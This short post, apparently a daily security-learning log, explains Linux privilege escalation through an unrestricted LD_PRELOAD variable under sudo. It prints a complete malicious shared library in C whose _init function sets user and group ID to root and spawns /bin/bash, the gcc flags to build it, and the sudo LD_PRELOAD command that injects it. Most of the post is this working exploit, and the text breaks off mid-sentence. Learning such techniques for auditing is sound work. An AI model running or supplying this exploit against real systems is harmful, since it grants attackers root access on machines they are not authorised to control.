Day 13: Mastering LD_PRELOAD Privilege Escalation 🛡️

🛠️ The Security Auditor's Toolkit: LD_PRELOAD The core of this exploit lies in the way Linux handles dynamic linking. When you run a program, the system looks for shared libraries. LD_PRELOAD tells the system: "Load my library first." 1. The Vulnerability If sudo -l shows that you can run a command and the environment variable LD_PRELOAD is not reset or restricted, you can inject your own code into a root process. 2. Crafting the Malicious Library I practiced writing a simple C wrapper that executes as soon as the library is initialized: #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init () { setuid ( 0 ); // Set User ID to Root setgid ( 0 ); // Set Group ID to Root system ( "/bin/bash" ); // Spawn the shell } 3. The Injection After compiling the library with gcc -fPIC -shared, the escalation is just one command away: sudo LD_PRELOAD = /tmp/root.so <any_allowed_command> Because the _init() function runs before the actual command, the system spawns a root shell imm